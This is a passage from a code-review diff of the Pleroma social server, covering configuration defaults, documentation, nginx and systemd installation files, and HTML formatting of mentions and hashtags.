No OneTemporary
Actions

Size

487 KB

Referenced Files

None

Subscribers

None

View Options

This file is larger than 256 KB, so syntax highlighting was skipped.

	diff --git a/config/config.exs b/config/config.exs
	index 9c4d73465..e8cf2ed3a 100644
	--- a/config/config.exs
	+++ b/config/config.exs
	@@ -1,283 +1,284 @@
	# This file is responsible for configuring your application
	# and its dependencies with the aid of the Mix.Config module.
	#
	# This configuration file is loaded before any dependency and
	# is restricted to this project.
	use Mix.Config

	# General application configuration
	config :pleroma, ecto_repos: [Pleroma.Repo]

	config :pleroma, Pleroma.Repo, types: Pleroma.PostgresTypes

	config :pleroma, Pleroma.Captcha,
	enabled: false,
	seconds_valid: 60,
	method: Pleroma.Captcha.Kocaptcha

	config :pleroma, Pleroma.Captcha.Kocaptcha, endpoint: "https://captcha.kotobank.ch"

	# Upload configuration
	config :pleroma, Pleroma.Upload,
	uploader: Pleroma.Uploaders.Local,
	filters: [],
	proxy_remote: false,
	proxy_opts: []

	config :pleroma, Pleroma.Uploaders.Local, uploads: "uploads"

	config :pleroma, Pleroma.Uploaders.S3,
	bucket: nil,
	public_endpoint: "https://s3.amazonaws.com"

	config :pleroma, Pleroma.Uploaders.MDII,
	cgi: "https://mdii.sakura.ne.jp/mdii-post.cgi",
	files: "https://mdii.sakura.ne.jp"

	config :pleroma, :emoji, shortcode_globs: ["/emoji/custom/*/.png"]

	config :pleroma, :uri_schemes,
	valid_schemes: [
	"https",
	"http",
	"dat",
	"dweb",
	"gopher",
	"ipfs",
	"ipns",
	"irc",
	"ircs",
	"magnet",
	"mailto",
	"mumble",
	"ssb",
	"xmpp"
	]

	websocket_config = [
	path: "/websocket",
	serializer: [
	{Phoenix.Socket.V1.JSONSerializer, "~> 1.0.0"},
	{Phoenix.Socket.V2.JSONSerializer, "~> 2.0.0"}
	],
	timeout: 60_000,
	transport_log: false,
	compress: false
	]

	# Configures the endpoint
	config :pleroma, Pleroma.Web.Endpoint,
	url: [host: "localhost"],
	http: [
	dispatch: [
	{:_,
	[
	{"/api/v1/streaming", Elixir.Pleroma.Web.MastodonAPI.WebsocketHandler, []},
	{"/socket/websocket", Phoenix.Endpoint.CowboyWebSocket,
	{nil, {Pleroma.Web.Endpoint, Pleroma.Web.UserSocket, websocket_config}}},
	{:_, Plug.Adapters.Cowboy.Handler, {Pleroma.Web.Endpoint, []}}
	]}
	]
	],
	protocol: "https",
	secret_key_base: "aK4Abxf29xU9TTDKre9coZPUgevcVCFQJe/5xP/7Lt4BEif6idBIbjupVbOrbKxl",
	signing_salt: "CqaoopA2",
	render_errors: [view: Pleroma.Web.ErrorView, accepts: ~w(json)],
	pubsub: [name: Pleroma.PubSub, adapter: Phoenix.PubSub.PG2],
	secure_cookie_flag: true

	# Configures Elixir's Logger
	config :logger, :console,
	format: "$time $metadata[$level] $message\n",
	metadata: [:request_id]

	config :logger, :ex_syslogger,
	level: :debug,
	ident: "Pleroma",
	format: "$date $time $metadata[$level] $message",
	metadata: [:request_id]

	config :mime, :types, %{
	"application/xml" => ["xml"],
	"application/xrd+xml" => ["xrd+xml"],
	"application/jrd+json" => ["jrd+json"],
	"application/activity+json" => ["activity+json"],
	"application/ld+json" => ["activity+json"]
	}

	config :pleroma, :websub, Pleroma.Web.Websub
	config :pleroma, :ostatus, Pleroma.Web.OStatus
	config :pleroma, :httpoison, Pleroma.HTTP
	config :tesla, adapter: Tesla.Adapter.Hackney

	# Configures http settings, upstream proxy etc.
	config :pleroma, :http, proxy_url: nil

	config :pleroma, :instance,
	name: "Pleroma",
	email: "example@example.com",
	description: "A Pleroma instance, an alternative fediverse server",
	limit: 5_000,
	remote_limit: 100_000,
	upload_limit: 16_000_000,
	avatar_upload_limit: 2_000_000,
	background_upload_limit: 4_000_000,
	banner_upload_limit: 4_000_000,
	registrations_open: true,
	federating: true,
	allow_relay: true,
	rewrite_policy: Pleroma.Web.ActivityPub.MRF.NoOpPolicy,
	public: true,
	quarantined_instances: [],
	managed_config: true,
	static_dir: "instance/static/",
	allowed_post_formats: [
	"text/plain",
	"text/html",
	"text/markdown"
	],
	finmoji_enabled: true,
	mrf_transparency: true,
	autofollowed_nicknames: [],
	- max_pinned_statuses: 1
	+ max_pinned_statuses: 1,
	+ no_attachment_links: false

	config :pleroma, :markup,
	# XXX - unfortunately, inline images must be enabled by default right now, because
	# of custom emoji. Issue #275 discusses defanging that somehow.
	allow_inline_images: true,
	allow_headings: false,
	allow_tables: false,
	allow_fonts: false,
	scrub_policy: [
	Pleroma.HTML.Transform.MediaProxy,
	Pleroma.HTML.Scrubber.Default
	]

	config :pleroma, :fe,
	theme: "pleroma-dark",
	logo: "/static/logo.png",
	logo_mask: true,
	logo_margin: "0.1em",
	background: "/static/aurora_borealis.jpg",
	redirect_root_no_login: "/main/all",
	redirect_root_login: "/main/friends",
	show_instance_panel: true,
	scope_options_enabled: false,
	formatting_options_enabled: false,
	collapse_message_with_subject: false,
	hide_post_stats: false,
	hide_user_stats: false,
	scope_copy: true,
	subject_line_behavior: "email",
	always_show_subject_input: true

	config :pleroma, :activitypub,
	accept_blocks: true,
	unfollow_blocked: true,
	outgoing_blocks: true,
	follow_handshake_timeout: 500

	config :pleroma, :user, deny_follow_blocked: true

	config :pleroma, :mrf_normalize_markup, scrub_policy: Pleroma.HTML.Scrubber.Default

	config :pleroma, :mrf_rejectnonpublic,
	allow_followersonly: false,
	allow_direct: false

	config :pleroma, :mrf_hellthread, threshold: 10

	config :pleroma, :mrf_simple,
	media_removal: [],
	media_nsfw: [],
	federated_timeline_removal: [],
	reject: [],
	accept: []

	config :pleroma, :media_proxy, enabled: false

	config :pleroma, :chat, enabled: true

	config :ecto, json_library: Jason

	config :phoenix, :format_encoders, json: Jason

	config :pleroma, :gopher,
	enabled: false,
	ip: {0, 0, 0, 0},
	port: 9999

	config :pleroma, Pleroma.Web.Metadata, providers: [], unfurl_nsfw: false

	config :pleroma, :suggestions,
	enabled: false,
	third_party_engine:
	"http://vinayaka.distsn.org/cgi-bin/vinayaka-user-match-suggestions-api.cgi?{{host}}+{{user}}",
	timeout: 300_000,
	limit: 23,
	web: "https://vinayaka.distsn.org/?{{host}}+{{user}}"

	config :pleroma, :http_security,
	enabled: true,
	sts: false,
	sts_max_age: 31_536_000,
	ct_max_age: 2_592_000,
	referrer_policy: "same-origin"

	config :cors_plug,
	max_age: 86_400,
	methods: ["POST", "PUT", "DELETE", "GET", "PATCH", "OPTIONS"],
	expose: [
	"Link",
	"X-RateLimit-Reset",
	"X-RateLimit-Limit",
	"X-RateLimit-Remaining",
	"X-Request-Id",
	"Idempotency-Key"
	],
	credentials: true,
	headers: ["Authorization", "Content-Type", "Idempotency-Key"]

	config :pleroma, Pleroma.User,
	restricted_nicknames: [
	".well-known",
	"~",
	"about",
	"activities",
	"api",
	"auth",
	"dev",
	"friend-requests",
	"inbox",
	"internal",
	"main",
	"media",
	"nodeinfo",
	"notice",
	"oauth",
	"objects",
	"ostatus_subscribe",
	"pleroma",
	"proxy",
	"push",
	"registration",
	"relay",
	"settings",
	"status",
	"tag",
	"user-search",
	"users",
	"web"
	]

	config :pleroma, Pleroma.Web.Federator, max_jobs: 50

	config :pleroma, Pleroma.Web.Federator.RetryQueue,
	enabled: false,
	max_jobs: 20,
	initial_timeout: 30,
	max_retries: 5

	# Import environment specific config. This must remain at the bottom
	# of this file so it overrides the configuration defined above.
	import_config "#{Mix.env()}.exs"
	diff --git a/docs/config.md b/docs/config.md
	index b9ad2aef7..5464fa90d 100644
	--- a/docs/config.md
	+++ b/docs/config.md
	@@ -1,218 +1,219 @@
	# Configuration

	This file describe the configuration, it is recommended to edit the relevant *.secret.exs file instead of the others founds in the ``config`` directory.
	If you run Pleroma with ``MIX_ENV=prod`` the file is ``prod.secret.exs``, otherwise it is ``dev.secret.exs``.

	## Pleroma.Upload
	* `uploader`: Select which `Pleroma.Uploaders` to use
	* `filters`: List of `Pleroma.Upload.Filter` to use.
	* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host.
	* `proxy_remote`: If you\'re using a remote uploader, Pleroma will proxy media requests instead of redirecting to it.
	* `proxy_opts`: Proxy options, see `Pleroma.ReverseProxy` documentation.

	Note: `strip_exif` has been replaced by `Pleroma.Upload.Filter.Mogrify`.

	## Pleroma.Uploaders.Local
	* `uploads`: Which directory to store the user-uploads in, relative to pleroma’s working directory

	## Pleroma.Upload.Filter.Mogrify

	* `args`: List of actions for the `mogrify` command like `"strip"` or `["strip", {"impode", "1"}]`.

	## Pleroma.Upload.Filter.Dedupe

	No specific configuration.

	## Pleroma.Upload.Filter.AnonymizeFilename

	This filter replaces the filename (not the path) of an upload. For complete obfuscation, add
	`Pleroma.Upload.Filter.Dedupe` before AnonymizeFilename.

	* `text`: Text to replace filenames in links. If empty, `{random}.extension` will be used.

	## Pleroma.Mailer
	* `adapter`: one of the mail adapters listed in [Swoosh readme](https://github.com/swoosh/swoosh#adapters), or `Swoosh.Adapters.Local` for in-memory mailbox.
	* `api_key` / `password` and / or other adapter-specific settings, per the above documentation.

	An example for Sendgrid adapter:

	```
	config :pleroma, Pleroma.Mailer,
	adapter: Swoosh.Adapters.Sendgrid,
	api_key: "YOUR_API_KEY"
	```

	An example for SMTP adapter:
	```
	config :pleroma, Pleroma.Mailer,
	adapter: Swoosh.Adapters.SMTP,
	relay: "smtp.gmail.com",
	username: "YOUR_USERNAME@gmail.com",
	password: "YOUR_SMTP_PASSWORD",
	port: 465,
	ssl: true,
	tls: :always,
	auth: :always
	```

	## :uri_schemes
	* `valid_schemes`: List of the scheme part that is considered valid to be an URL

	## :instance
	* `name`: The instance’s name
	* `email`: Email used to reach an Administrator/Moderator of the instance
	* `description`: The instance’s description, can be seen in nodeinfo and ``/api/v1/instance``
	* `limit`: Posts character limit (CW/Subject included in the counter)
	* `remote_limit`: Hard character limit beyond which remote posts will be dropped.
	* `upload_limit`: File size limit of uploads (except for avatar, background, banner)
	* `avatar_upload_limit`: File size limit of user’s profile avatars
	* `background_upload_limit`: File size limit of user’s profile backgrounds
	* `banner_upload_limit`: File size limit of user’s profile banners
	* `registrations_open`: Enable registrations for anyone, invitations can be enabled when false.
	* `invites_enabled`: Enable user invitations for admins (depends on `registrations_open: false`).
	* `account_activation_required`: Require users to confirm their emails before signing in.
	* `federating`: Enable federation with other instances
	* `allow_relay`: Enable Pleroma’s Relay, which makes it possible to follow a whole instance
	* `rewrite_policy`: Message Rewrite Policy, either one or a list. Here are the ones available by default:
	* `Pleroma.Web.ActivityPub.MRF.NoOpPolicy`: Doesn’t modify activities (default)
	* `Pleroma.Web.ActivityPub.MRF.DropPolicy`: Drops all activities. It generally doesn’t makes sense to use in production
	* `Pleroma.Web.ActivityPub.MRF.SimplePolicy`: Restrict the visibility of activities from certains instances (See ``:mrf_simple`` section)
	* `Pleroma.Web.ActivityPub.MRF.RejectNonPublic`: Drops posts with non-public visibility settings (See ``:mrf_rejectnonpublic`` section)
	* `Pleroma.Web.ActivityPub.MRF.EnsureRePrepended`: Rewrites posts to ensure that replies to posts with subjects do not have an identical subject and instead begin with re:.
	* `public`: Makes the client API in authentificated mode-only except for user-profiles. Useful for disabling the Local Timeline and The Whole Known Network.
	* `quarantined_instances`: List of ActivityPub instances where private(DMs, followers-only) activities will not be send.
	* `managed_config`: Whenether the config for pleroma-fe is configured in this config or in ``static/config.json``
	* `allowed_post_formats`: MIME-type list of formats allowed to be posted (transformed into HTML)
	* `finmoji_enabled`: Whenether to enable the finmojis in the custom emojis.
	* `mrf_transparency`: Make the content of your Message Rewrite Facility settings public (via nodeinfo).
	* `scope_copy`: Copy the scope (private/unlisted/public) in replies to posts by default.
	* `subject_line_behavior`: Allows changing the default behaviour of subject lines in replies. Valid values:
	* "email": Copy and preprend re:, as in email.
	* "masto": Copy verbatim, as in Mastodon.
	* "noop": Don't copy the subject.
	* `always_show_subject_input`: When set to false, auto-hide the subject field when it's empty.
	* `extended_nickname_format`: Set to `true` to use extended local nicknames format (allows underscores/dashes). This will break federation with
	older software for theses nicknames.
	* `max_pinned_statuses`: The maximum number of pinned statuses. `0` will disable the feature.
	* `autofollowed_nicknames`: Set to nicknames of (local) users that every new user should automatically follow.
	+* `no_attachment_links`: Set to true to disable automatically adding attachment link text to statuses

	## :logger
	* `backends`: `:console` is used to send logs to stdout, `{ExSyslogger, :ex_syslogger}` to log to syslog
	See: [logger’s documentation](https://hexdocs.pm/logger/Logger.html) and [ex_syslogger’s documentation](https://hexdocs.pm/ex_syslogger/)

	## :fe
	This section is used to configure Pleroma-FE, unless ``:managed_config`` in ``:instance`` is set to false.

	* `theme`: Which theme to use, they are defined in ``styles.json``
	* `logo`: URL of the logo, defaults to Pleroma’s logo
	* `logo_mask`: Whenether to mask the logo
	* `logo_margin`: What margin to use around the logo
	* `background`: URL of the background, unless viewing a user profile with a background that is set
	* `redirect_root_no_login`: relative URL which indicates where to redirect when a user isn’t logged in.
	* `redirect_root_login`: relative URL which indicates where to redirect when a user is logged in.
	* `show_instance_panel`: Whenether to show the instance’s specific panel.
	* `scope_options_enabled`: Enable setting an notice visibility and subject/CW when posting
	* `formatting_options_enabled`: Enable setting a formatting different than plain-text (ie. HTML, Markdown) when posting, relates to ``:instance, allowed_post_formats``
	* `collapse_message_with_subjects`: When a message has a subject(aka Content Warning), collapse it by default
	* `hide_post_stats`: Hide notices statistics(repeats, favorites, …)
	* `hide_user_stats`: Hide profile statistics(posts, posts per day, followers, followings, …)

	## :mrf_simple
	* `media_removal`: List of instances to remove medias from
	* `media_nsfw`: List of instances to put medias as NSFW(sensitive) from
	* `federated_timeline_removal`: List of instances to remove from Federated (aka The Whole Known Network) Timeline
	* `reject`: List of instances to reject any activities from
	* `accept`: List of instances to accept any activities from

	## :mrf_rejectnonpublic
	* `allow_followersonly`: whether to allow followers-only posts
	* `allow_direct`: whether to allow direct messages

	## :mrf_hellthread
	* `threshold`: Number of mentioned users after which the message gets discarded as spam

	## :media_proxy
	* `enabled`: Enables proxying of remote media to the instance’s proxy
	* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host/CDN fronts.
	* `proxy_opts`: All options defined in `Pleroma.ReverseProxy` documentation, defaults to `[max_body_length: (25*1_048_576)]`.

	## :gopher
	* `enabled`: Enables the gopher interface
	* `ip`: IP address to bind to
	* `port`: Port to bind to

	## :activitypub
	* ``accept_blocks``: Whether to accept incoming block activities from other instances
	* ``unfollow_blocked``: Whether blocks result in people getting unfollowed
	* ``outgoing_blocks``: Whether to federate blocks to other instances
	* ``deny_follow_blocked``: Whether to disallow following an account that has blocked the user in question

	## :http_security
	* ``enabled``: Whether the managed content security policy is enabled
	* ``sts``: Whether to additionally send a `Strict-Transport-Security` header
	* ``sts_max_age``: The maximum age for the `Strict-Transport-Security` header if sent
	* ``ct_max_age``: The maximum age for the `Expect-CT` header if sent
	* ``referrer_policy``: The referrer policy to use, either `"same-origin"` or `"no-referrer"`.

	## :mrf_user_allowlist

	The keys in this section are the domain names that the policy should apply to.
	Each key should be assigned a list of users that should be allowed through by
	their ActivityPub ID.

	An example:

	```
	config :pleroma, :mrf_user_allowlist,
	"example.org": ["https://example.org/users/admin"]
	```

	## :web_push_encryption, :vapid_details

	Web Push Notifications configuration. You can use the mix task `mix web_push.gen.keypair` to generate it.

	* ``subject``: a mailto link for the administrative contact. It’s best if this email is not a personal email address, but rather a group email so that if a person leaves an organization, is unavailable for an extended period, or otherwise can’t respond, someone else on the list can.
	* ``public_key``: VAPID public key
	* ``private_key``: VAPID private key

	## Pleroma.Captcha
	* `enabled`: Whether the captcha should be shown on registration
	* `method`: The method/service to use for captcha
	* `seconds_valid`: The time in seconds for which the captcha is valid

	### Pleroma.Captcha.Kocaptcha
	Kocaptcha is a very simple captcha service with a single API endpoint,
	the source code is here: https://github.com/koto-bank/kocaptcha. The default endpoint
	`https://captcha.kotobank.ch` is hosted by the developer.

	* `endpoint`: the kocaptcha endpoint to use

	## :admin_token

	Allows to set a token that can be used to authenticate with the admin api without using an actual user by giving it as the 'admin_token' parameter. Example:

	```
	config :pleroma, :admin_token, "somerandomtoken"
	```

	You can then do
	```
	curl "http://localhost:4000/api/pleroma/admin/invite_token?admin_token=somerandomtoken"
	```

	## Pleroma.Web.Federator

	* `max_jobs`: The maximum amount of parallel federation jobs running at the same time.

	## Pleroma.Web.Federator.RetryQueue

	* `enabled`: If set to `true`, failed federation jobs will be retried
	* `max_jobs`: The maximum amount of parallel federation jobs running at the same time.
	* `initial_timeout`: The initial timeout in seconds
	* `max_retries`: The maximum number of times a federation job is retried

	## Pleroma.Web.Metadata
	* `providers`: a list of metadata providers to enable. Providers availible:
	* Pleroma.Web.Metadata.Providers.OpenGraph
	* Pleroma.Web.Metadata.Providers.TwitterCard
	* `unfurl_nsfw`: If set to `true` nsfw attachments will be shown in previews
	diff --git a/installation/pleroma.nginx b/installation/pleroma.nginx
	index 46b84fb50..a24bb0e61 100644
	--- a/installation/pleroma.nginx
	+++ b/installation/pleroma.nginx
	@@ -1,86 +1,88 @@
	# default nginx site config for Pleroma
	#
	# Simple installation instructions:
	# 1. Install your TLS certificate, possibly using Let's Encrypt.
	# 2. Replace 'example.tld' with your instance's domain wherever it appears.
	# 3. Copy this file to /etc/nginx/sites-available/ and then add a symlink to it
	# in /etc/nginx/sites-enabled/ and run 'nginx -s reload' or restart nginx.

	proxy_cache_path /tmp/pleroma-media-cache levels=1:2 keys_zone=pleroma_media_cache:10m max_size=10g
	inactive=720m use_temp_path=off;

	server {
	server_name example.tld;
	listen 80;
	return 301 https://$server_name$request_uri;

	# Uncomment this if you need to use the 'webroot' method with certbot. Make sure
	# that you also create the .well-known/acme-challenge directory structure in pleroma/priv/static and
	# that is is accessible by the webserver. You may need to load this file with the ssl
	# server block commented out, run certbot to get the certificate, and then uncomment it.
	#
	# location ~ /\.well-known/acme-challenge {
	# root <path to install>/pleroma/priv/static/;
	# }
	}

	# Enable SSL session caching for improved performance
	ssl_session_cache shared:ssl_session_cache:10m;

	server {
	listen 443 ssl http2;
	ssl_session_timeout 5m;

	ssl_trusted_certificate /etc/letsencrypt/live/example.tld/fullchain.pem;
	ssl_certificate /etc/letsencrypt/live/example.tld/fullchain.pem;
	ssl_certificate_key /etc/letsencrypt/live/example.tld/privkey.pem;

	# Add TLSv1.0 to support older devices
	ssl_protocols TLSv1.2;
	# Uncomment line below if you want to support older devices (Before Android 4.4.2, IE 8, etc.)
	# ssl_ciphers "HIGH:!aNULL:!MD5 or HIGH:!aNULL:!MD5:!3DES";
	ssl_ciphers "ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:!aNULL:!eNULL:!EXPORT:!DES:!MD5:!PSK:!RC4";
	ssl_prefer_server_ciphers on;
	# In case of an old server with an OpenSSL version of 1.0.2 or below,
	# leave only prime256v1 or comment out the following line.
	ssl_ecdh_curve X25519:prime256v1:secp384r1:secp521r1;
	ssl_stapling on;
	ssl_stapling_verify on;

	server_name example.tld;

	gzip_vary on;
	gzip_proxied any;
	gzip_comp_level 6;
	gzip_buffers 16 8k;
	gzip_http_version 1.1;
	gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript application/activity+json application/atom+xml;

	# the nginx default is 1m, not enough for large media uploads
	client_max_body_size 16m;

	location / {
	proxy_http_version 1.1;
	proxy_set_header Upgrade $http_upgrade;
	proxy_set_header Connection "upgrade";
	proxy_set_header Host $http_host;

	proxy_pass http://localhost:4000;

	client_max_body_size 16m;
	}

	location ~ ^/(media\|proxy) {
	proxy_cache pleroma_media_cache;
	slice 1m;
	proxy_cache_key $host$uri$is_args$args$slice_range;
	proxy_set_header Range $slice_range;
	proxy_http_version 1.1;
	proxy_cache_valid 200 206 301 304 1h;
	proxy_cache_lock on;
	proxy_ignore_client_abort on;
	- proxy_buffering off;
	+ proxy_buffering on;
	chunked_transfer_encoding on;
	+ proxy_ignore_headers Cache-Control;
	+ proxy_hide_header Cache-Control;
	proxy_pass http://localhost:4000;
	}
	}
	diff --git a/installation/pleroma.service b/installation/pleroma.service
	index f1ed56cb3..72090bbc7 100644
	--- a/installation/pleroma.service
	+++ b/installation/pleroma.service
	@@ -1,28 +1,36 @@
	[Unit]
	Description=Pleroma social network
	After=network.target postgresql.service

	[Service]
	-User=pleroma
	-WorkingDirectory=/home/pleroma/pleroma
	-Environment="HOME=/home/pleroma"
	-Environment="MIX_ENV=prod"
	-ExecStart=/usr/local/bin/mix phx.server
	ExecReload=/bin/kill $MAINPID
	KillMode=process
	Restart=on-failure

	+; Name of the user that runs the Pleroma service.
	+User=pleroma
	+; Declares that Pleroma runs in production mode.
	+Environment="MIX_ENV=prod"
	+
	+; Make sure that all paths fit your installation.
	+; Path to the home directory of the user running the Pleroma service.
	+Environment="HOME=/home/pleroma"
	+; Path to the folder containing the Pleroma installation.
	+WorkingDirectory=/home/pleroma/pleroma
	+; Path to the Mix binary.
	+ExecStart=/usr/bin/mix phx.server
	+
	; Some security directives.
	; Use private /tmp and /var/tmp folders inside a new file system namespace, which are discarded after the process stops.
	PrivateTmp=true
	; Mount /usr, /boot, and /etc as read-only for processes invoked by this service.
	ProtectSystem=full
	; Sets up a new /dev mount for the process and only adds API pseudo devices like /dev/null, /dev/zero or /dev/random but not physical devices. Disabled by default because it may not work on devices like the Raspberry Pi.
	PrivateDevices=false
	; Ensures that the service process and all its children can never gain new privileges through execve().
	NoNewPrivileges=true
	; Drops the sysadmin capability from the daemon.
	CapabilityBoundingSet=~CAP_SYS_ADMIN

	[Install]
	WantedBy=multi-user.target
	diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex
	index 2696f41c0..9e50ea3f4 100644
	--- a/lib/pleroma/formatter.ex
	+++ b/lib/pleroma/formatter.ex
	@@ -1,208 +1,210 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Formatter do
	alias Pleroma.User
	alias Pleroma.Web.MediaProxy
	alias Pleroma.HTML
	alias Pleroma.Emoji

	@tag_regex ~r/((?<=[^&])\|\A)(\#)(\w+)/u
	@markdown_characters_regex ~r/(`\|\*\|_\|{\|}\|[\|]\|$\|$\|#\|\+\|-\|\.\|!)/

	# Modified from https://www.w3.org/TR/html5/forms.html#valid-e-mail-address
	@mentions_regex ~r/@[a-zA-Z0-9.!#$%&'+\/=?^_`{\|}~-]@?[a-zA-Z0-9_-](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*/u

	def parse_tags(text, data \\ %{}) do
	Regex.scan(@tag_regex, text)
	\|> Enum.map(fn ["#" <> tag = full_tag \| _] -> {full_tag, String.downcase(tag)} end)
	\|> (fn map ->
	if data["sensitive"] in [true, "True", "true", "1"],
	do: [{"#nsfw", "nsfw"}] ++ map,
	else: map
	end).()
	end

	@doc "Parses mentions text and returns list {nickname, user}."
	@spec parse_mentions(binary()) :: list({binary(), User.t()})
	def parse_mentions(text) do
	Regex.scan(@mentions_regex, text)
	\|> List.flatten()
	\|> Enum.uniq()
	\|> Enum.map(fn nickname ->
	with nickname <- String.trim_leading(nickname, "@"),
	do: {"@" <> nickname, User.get_cached_by_nickname(nickname)}
	end)
	\|> Enum.filter(fn {_match, user} -> user end)
	end

	def emojify(text) do
	emojify(text, Emoji.get_all())
	end

	def emojify(text, nil), do: text

	def emojify(text, emoji, strip \\ false) do
	Enum.reduce(emoji, text, fn {emoji, file}, text ->
	emoji = HTML.strip_tags(emoji)
	file = HTML.strip_tags(file)

	String.replace(
	text,
	":#{emoji}:",
	if not strip do
	"<img height='32px' width='32px' alt='#{emoji}' title='#{emoji}' src='#{
	MediaProxy.url(file)
	}' />"
	else
	""
	end
	)
	\|> HTML.filter_tags()
	end)
	end

	def demojify(text) do
	emojify(text, Emoji.get_all(), true)
	end

	def demojify(text, nil), do: text

	def get_emoji(text) when is_binary(text) do
	Enum.filter(Emoji.get_all(), fn {emoji, _} -> String.contains?(text, ":#{emoji}:") end)
	end

	def get_emoji(_), do: []

	@link_regex ~r/[0-9a-z+\-\.]+:[0-9a-z$-_.+!*'(),]+/ui

	@uri_schemes Application.get_env(:pleroma, :uri_schemes, [])
	@valid_schemes Keyword.get(@uri_schemes, :valid_schemes, [])

	# TODO: make it use something other than @link_regex
	def html_escape(text, "text/html") do
	HTML.filter_tags(text)
	end

	def html_escape(text, "text/plain") do
	Regex.split(@link_regex, text, include_captures: true)
	\|> Enum.map_every(2, fn chunk ->
	{:safe, part} = Phoenix.HTML.html_escape(chunk)
	part
	end)
	\|> Enum.join("")
	end

	@doc """
	Escapes a special characters in mention names.
	"""
	@spec mentions_escape(String.t(), list({String.t(), any()})) :: String.t()
	def mentions_escape(text, mentions) do
	mentions
	\|> Enum.reduce(text, fn {name, _}, acc ->
	escape_name = String.replace(name, @markdown_characters_regex, "\\\\\\1")
	String.replace(acc, name, escape_name)
	end)
	end

	@doc "changes scheme:... urls to html links"
	def add_links({subs, text}) do
	links =
	text
	\|> String.split([" ", "\t", "<br>"])
	\|> Enum.filter(fn word -> String.starts_with?(word, @valid_schemes) end)
	\|> Enum.filter(fn word -> Regex.match?(@link_regex, word) end)
	\|> Enum.map(fn url -> {Ecto.UUID.generate(), url} end)
	\|> Enum.sort_by(fn {_, url} -> -String.length(url) end)

	uuid_text =
	links
	\|> Enum.reduce(text, fn {uuid, url}, acc -> String.replace(acc, url, uuid) end)

	subs =
	subs ++
	Enum.map(links, fn {uuid, url} ->
	{uuid, "<a href=\"#{url}\">#{url}</a>"}
	end)

	{subs, uuid_text}
	end

	@doc "Adds the links to mentioned users"
	def add_user_links({subs, text}, mentions) do
	mentions =
	mentions
	\|> Enum.sort_by(fn {name, _} -> -String.length(name) end)
	\|> Enum.map(fn {name, user} -> {name, user, Ecto.UUID.generate()} end)

	uuid_text =
	mentions
	\|> Enum.reduce(text, fn {match, _user, uuid}, text ->
	String.replace(text, match, uuid)
	end)

	subs =
	subs ++
	Enum.map(mentions, fn {match, %User{id: id, ap_id: ap_id, info: info}, uuid} ->
	ap_id =
	if is_binary(info.source_data["url"]) do
	info.source_data["url"]
	else
	ap_id
	end

	short_match = String.split(match, "@") \|> tl() \|> hd()

	{uuid,
	- "<span><a data-user='#{id}' class='mention' href='#{ap_id}'>@<span>#{short_match}</span></a></span>"}
	+ "<span class='h-card'><a data-user='#{id}' class='u-url mention' href='#{ap_id}'>@<span>#{
	+ short_match
	+ }</span></a></span>"}
	end)

	{subs, uuid_text}
	end

	@doc "Adds the hashtag links"
	def add_hashtag_links({subs, text}, tags) do
	tags =
	tags
	\|> Enum.sort_by(fn {name, _} -> -String.length(name) end)
	\|> Enum.map(fn {name, short} -> {name, short, Ecto.UUID.generate()} end)

	uuid_text =
	tags
	\|> Enum.reduce(text, fn {match, _short, uuid}, text ->
	String.replace(text, ~r/((?<=[^&])\|(\A))#{match}/, uuid)
	end)

	subs =
	subs ++
	Enum.map(tags, fn {tag_text, tag, uuid} ->
	url =
	- "<a data-tag='#{tag}' href='#{Pleroma.Web.base_url()}/tag/#{tag}' rel='tag'>#{
	+ "<a class='hashtag' data-tag='#{tag}' href='#{Pleroma.Web.base_url()}/tag/#{tag}' rel='tag'>#{
	tag_text
	}</a>"

	{uuid, url}
	end)

	{subs, uuid_text}
	end

	def finalize({subs, text}) do
	Enum.reduce(subs, text, fn {uuid, replacement}, result_text ->
	String.replace(result_text, uuid, replacement)
	end)
	end

	def truncate(text, max_length \\ 200, omission \\ "...") do
	# Remove trailing whitespace
	text = Regex.replace(~r/([^ \t\r\n])([ \t]+$)/u, text, "\\g{1}")

	if String.length(text) < max_length do
	text
	else
	length_with_omission = max_length - String.length(omission)
	String.slice(text, 0, length_with_omission) <> omission
	end
	end
	end
	diff --git a/lib/pleroma/html.ex b/lib/pleroma/html.ex
	index 0c5b0f03f..f5c6e5033 100644
	--- a/lib/pleroma/html.ex
	+++ b/lib/pleroma/html.ex
	@@ -1,217 +1,217 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.HTML do
	alias HtmlSanitizeEx.Scrubber

	defp get_scrubbers(scrubber) when is_atom(scrubber), do: [scrubber]
	defp get_scrubbers(scrubbers) when is_list(scrubbers), do: scrubbers
	defp get_scrubbers(_), do: [Pleroma.HTML.Scrubber.Default]

	def get_scrubbers() do
	Pleroma.Config.get([:markup, :scrub_policy])
	\|> get_scrubbers
	end

	def filter_tags(html, nil) do
	filter_tags(html, get_scrubbers())
	end

	def filter_tags(html, scrubbers) when is_list(scrubbers) do
	Enum.reduce(scrubbers, html, fn scrubber, html ->
	filter_tags(html, scrubber)
	end)
	end

	def filter_tags(html, scrubber), do: Scrubber.scrub(html, scrubber)
	def filter_tags(html), do: filter_tags(html, nil)
	def strip_tags(html), do: Scrubber.scrub(html, Scrubber.StripTags)

	def get_cached_scrubbed_html_for_object(content, scrubbers, object, module) do
	key = "#{module}#{generate_scrubber_signature(scrubbers)}\|#{object.id}"
	Cachex.fetch!(:scrubber_cache, key, fn _key -> ensure_scrubbed_html(content, scrubbers) end)
	end

	def get_cached_stripped_html_for_object(content, object, module) do
	get_cached_scrubbed_html_for_object(
	content,
